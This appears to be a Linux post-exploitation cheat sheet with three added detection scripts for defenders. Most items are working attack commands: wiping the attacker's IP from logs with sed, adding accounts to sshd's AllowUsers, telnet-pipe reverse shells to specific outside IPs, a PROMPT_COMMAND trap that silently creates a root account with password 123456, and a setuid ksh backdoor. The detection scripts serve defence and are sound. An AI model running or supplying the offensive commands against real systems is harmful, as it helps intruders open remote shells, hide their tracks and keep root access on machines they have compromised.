1. Do not record history after logging on to ssh
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
This only stops the current shell (and the children that inherit its environment) from writing ~/.bash_history; it does nothing about lines already written, about auditd/execve logging, or about a pty recorder on the session.
2. Some evil uses of sed
Replace the logon IP address and the access IP address in the logs with an innocuous one:
sed -i 's/211.xxx.xxx.xxx/192.168.1.1/g' access_log access.log secure
Attackers can add their own accounts to an AllowUsers restriction in sshd_config:
sed -i 's/AllowUsers fuck/AllowUsers fuck root oracle rqcuser/g' sshd_config
Here "fuck" is the account that was already on the AllowUsers line. The edit only takes effect once sshd re-reads its configuration, so the listening sshd has to be told to reload.
lsof -i :22 finds the sshd process IDs:
COMMAND PID   USER FD  TYPE DEVICE   SIZE NODE NAME
sshd    18662 root 11u IPv6 27925867      TCP  *:ssh (LISTEN)
sshd    31793 sshd 12u IPv6 34742994      TCP  192.168.1.2:ssh->192.168.1.5:49080 (ESTABLISHED)
Then send SIGHUP to the listening master process (18662), which makes it re-exec and re-read sshd_config. Do not pick the per-session process (31793, in the ESTABLISHED line): that would only drop that one session.
kill -SIGHUP 18662
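The history-suppression settings from item 1 leave a trace of their own: every process started from such a shell inherits them, and on Linux the inherited environment is readable from /proc/<pid>/environ. The script below is an added example (not part of the original page) that looks for that trace. It assumes a Linux /proc and, to read other users' processes, root; the exact set of flagged variables is an assumption too.

```shell
#!/bin/sh
# Added example, not from the original page: look for processes whose
# environment carries the history-suppression settings from item 1.
# /proc/<pid>/environ is frozen at exec time, so an 'export' typed into an
# already-running shell is not visible for that shell itself, but it is
# visible in every child it starts afterwards (sudo, ssh, a second bash).
# Assumes Linux /proc; reading other users' processes needs root.

# Print the telltale variables found in a NUL-separated environ blob ($1 is
# a file path). Returns 0 if anything matched, 1 otherwise. The list of
# flagged settings is an assumption; extend it for your environment.
environ_is_suspicious() {
    tr '\0' '\n' < "$1" | grep -E -x \
        'HISTFILE=/dev/null|HISTFILE=|HISTSIZE=0|HISTFILESIZE=0'
}

# Walk every process and report pid, owner, command line and the hits.
audit_history_env() {
    for env_file in /proc/[0-9]*/environ; do
        pid=${env_file#/proc/}; pid=${pid%/environ}
        hits=$(environ_is_suspicious "$env_file" 2>/dev/null) || continue
        printf '%s %s %s: %s\n' "$pid" \
            "$(stat -c %U "/proc/$pid" 2>/dev/null)" \
            "$(tr '\0' ' ' < "/proc/$pid/cmdline" 2>/dev/null)" \
            "$(printf '%s' "$hits" | tr '\n' ' ')"
    done
}

# Usage: sh audit_history_env.sh run   (as root, for all users' processes)
case "${1:-}" in run) audit_history_env ;; esac
```

A process whose owner is an interactive user and whose HISTFILE points at /dev/null is worth a closer look at the session it belongs to; the sshd per-session processes from the lsof listing above tell you which connection that is.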
3. Get a real tty shell after a shell is bounced back through a webshell
python -c 'import pty; pty.spawn("/bin/sh")'
Another way to get a tty shell is an expect script:
$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
Run it with expect (the original note said bash sh.exp, which fails because spawn and interact are expect commands, not shell commands):
expect sh.exp
4. Reverse connections via telnet:
telnet [attacker_ipaddr] [port1] | /bin/bash | telnet [attacker_ipaddr] [port2]
telnet 210.51.173.41 8080 | /bin/bash | telnet 210.51.173.41 8081
/usr/bin/telnet 203.93.28.236 8000 | /bin/bash | /usr/bin/telnet 203.93.28.236 8001
Start the two listeners on 203.93.28.236 first; commands are typed into the 8000 listener and the output comes back on the 8001 listener:
nc -l -p 8000
nc -l -p 8001
/usr/bin/telnet 192.168.1.100 8088 | /bin/bash | /usr/bin/telnet 192.168.1.100 8089
Only stdout travels back over the second connection; use /bin/bash 2>&1 in the middle of the pipeline to see error output as well.
5. curl download
The full command should look something like this (-C - resumes an interrupted transfer from where it stopped, -O saves under the remote file name):
curl -C - -O http://www.mirror.com/path/to/NeoOffice-Patch.dmg
6. nc listening on Windows with a shell pushed back from Linux: fix for broken line feeds in command output
The distribution's colourised ls alias emits terminal escape sequences that the Windows console does not render, which is what mangles the output. Drop the alias in the returned shell:
unalias ls
7. Linux bash privilege escalation
export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"
bash evaluates PROMPT_COMMAND before it prints each prompt. Planted in a start-up file or environment that a root shell picks up, this creates the uid-0 account kkoo with password 123456 at the first prompt and then removes itself from the environment; it is a trap that fires when root next opens a shell, not something the unprivileged user runs directly.
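Because the trap in item 7 depends on bash sourcing it, the place to look for it is the start-up files a root shell reads. The script below is an added example, not part of the original page: it lists PROMPT_COMMAND assignments that invoke account- or file-changing tools. The set of suspect commands and the list of start-up files are assumptions to adapt to the distribution.

```shell
#!/bin/sh
# Added example, not from the original page: find PROMPT_COMMAND settings in
# shell start-up files that do more than decorate the prompt. bash runs
# PROMPT_COMMAND before every prompt, so anything a root shell sources
# (/etc/profile, /etc/bash.bashrc, /etc/profile.d/*, root's ~/.bashrc and
# ~/.bash_profile) is where a trap like the useradd/chpasswd one would live.

# Commands that have no business in a prompt hook (assumed list; extend it).
SUSPECT_CMDS='useradd|usermod|chpasswd|passwd|visudo|chmod|chown|nc|curl|wget|base64'

# Print, with line numbers, each PROMPT_COMMAND assignment in file $1 that
# references one of the suspect commands as a whole word (so /usr/sbin/useradd
# matches but "sync" does not trigger on "nc").
# Returns 0 when at least one line was flagged, 1 otherwise.
scan_prompt_command() {
    grep -n -E 'PROMPT_COMMAND=' "$1" 2>/dev/null \
        | grep -E "(^|[^A-Za-z_])($SUSPECT_CMDS)([^A-Za-z_]|$)"
}

# Scan the usual start-up files for user $1 (defaults to root); the home
# directory comes from the passwd database. Assumed file list.
scan_startup_files() {
    home=$(getent passwd "${1:-root}" | cut -d: -f6)
    for f in /etc/profile /etc/bash.bashrc /etc/bashrc /etc/profile.d/*.sh \
             "$home/.bashrc" "$home/.bash_profile" "$home/.profile"; do
        [ -f "$f" ] || continue
        scan_prompt_command "$f" | sed "s|^|$f:|"
    done
}

# Usage: sh scan_prompt_command.sh scan [user]
case "${1:-}" in scan) scan_startup_files "${2:-root}" ;; esac
```

A benign PROMPT_COMMAND (for example history -a, or a terminal-title update) produces no output; a hit prints file, line number and the offending assignment so the line can be inspected before anything is removed.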
8. ssh tunnel
ssh -C -f -N -g -L listen_port:ST_Host:ST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_port:ST_Host:ST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host
-C compresses the connection, -f goes to the background after authentication, -N runs no remote command, and -g lets hosts other than localhost connect to the forwarded port. -L listens on listen_port locally and forwards through Tunnel_Host to ST_Host:ST_port; -R listens on listen_port on Tunnel_Host and forwards back through the local side to ST_Host:ST_port (other hosts can reach that listener only if sshd on Tunnel_Host has GatewayPorts enabled); -D opens a SOCKS proxy on listen_port whose traffic exits from Tunnel_Host.
9. Local root shell
bash and tcsh won't work (bash drops a setuid effective uid unless started with -p); ash, bsh, zsh and ksh do. The procedure is simple: cp /bin/ksh .; chown root.root ksh; chmod 4755 ksh, then run ./ksh to get root privileges. Planting it needs root once (for the chown), so this is a backdoor that keeps root after it has been obtained, not a way to obtain it. Although the trick looks crude, it is useful in some cases, so removing unneeded shells raises the intrusion cost somewhat. If a shell is not needed on a host, consider adding its removal to the standard build.
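The check that goes with this trick is a sweep for setuid shells. An attacker usually renames the copy, so matching on the file name is not enough; a copy still hashes the same as the system shell it came from. The script below is an added example (not part of the original page) that hashes the shells found in the standard binary directories and compares every setuid file on the filesystem against them. The list of shell names and directories, and the use of sha256sum, are assumptions.

```shell
#!/bin/sh
# Added example, not from the original page: find setuid copies of shells
# like the ksh backdoor above, including copies that were renamed. Every
# setuid regular file under the given root is hashed and compared with the
# hashes of the shells installed in the usual directories; a file whose
# basename is a shell name is flagged as well.

# Assumed list of shell names and of directories that hold the originals.
SHELL_NAMES='sh bash dash ash ksh mksh zsh csh tcsh bsh'
SHELL_DIRS='/bin /usr/bin /usr/local/bin'

# SHA-256 of file $1 (empty output if it cannot be read).
hash_of() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"
    else shasum -a 256 "$1"; fi 2>/dev/null | cut -d' ' -f1
}

# One "hash path" line per installed shell (symlinks are followed, so
# /bin/sh -> dash hashes as dash).
known_shell_hashes() {
    for n in $SHELL_NAMES; do
        for d in $SHELL_DIRS; do
            [ -f "$d/$n" ] && printf '%s %s\n' "$(hash_of "$d/$n")" "$d/$n"
        done
    done | sort -u
}

# Walk $1 (default /) for setuid regular files and print each one whose
# content matches a known shell or whose name is a shell name.
# Returns 0 if anything was flagged, 1 otherwise.
find_setuid_shells() {
    known=$(known_shell_hashes)
    found=1
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null | while read -r f; do
        h=$(hash_of "$f")
        [ -n "$h" ] || continue
        match=$(printf '%s\n' "$known" | grep -F "$h " | cut -d' ' -f2 | head -n1)
        base=$(basename "$f")
        for n in $SHELL_NAMES; do [ "$base" = "$n" ] && match="${match:-name}"; done
        [ -n "$match" ] && printf '%s setuid shell (matches %s)\n' "$f" "$match"
    done | grep . && found=0
    return $found
}

# Usage: sh find_setuid_shells.sh scan [root]   (run as root for a full sweep)
case "${1:-}" in scan) find_setuid_shells "${2:-/}" ;; esac
```

Run as root so that directories such as /root and other users' homes are included; -xdev keeps the walk on one filesystem, so run it once per mounted filesystem that is not mounted nosuid. A hit reports the matched original, which tells you which shell was copied even when the file was renamed.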